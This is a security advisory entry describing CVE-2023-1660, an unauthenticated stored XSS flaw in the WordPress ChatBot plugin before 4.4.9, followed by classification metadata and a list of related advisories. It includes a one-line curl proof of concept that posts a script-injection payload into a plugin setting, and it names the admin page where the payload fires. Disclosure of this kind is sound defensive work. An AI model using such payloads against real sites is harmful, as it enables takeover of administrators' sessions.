ChatBot < 4.4.9 – Unauthenticated Stored XSS | CVE 2023-1660 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF in a function hooked to init, allowing unauthenticated users to update some settings, leading to Stored XSS due to the lack of escaping when outputting them in the admin dashboard

Proof of Concept

curl -X POST --data 'qc_bot_str_weight=" style=animation-name:rotation onanimationstart=alert(/XSS/)//' http://127.0.0.1/

The XSS will be trigged when an admin view the Simple Text response dashboard (/wp-admin/admin.php?page=simple-text-response)

Affects Plugins

Fixed in 4.4.9

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

1a5cbcfc-fa55-433a-a76b-3881b6c4bea2

Timeline

Publicly Published

2023-04-12 (about 2 years ago)

Added

2023-04-12 (about 2 years ago)

Last Updated

2023-04-12 (about 2 years ago)

Other

Published

Title

Published

2021-09-09

Title

SMS OVH <= 0.1 - Reflected Cross-Site Scripting

Published

2024-10-14

Title

Mighty Builder <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-12-12

Title

YITH WooCommerce Quick View < 2.7.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via yith_quick_view Shortcode

Published

2023-08-14

Title

123.chat < 1.3.1 - Admin+ Stored XSS

Published

2025-05-19

Title

Additional Custom Emails & Recipients for WooCommerce < 3.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting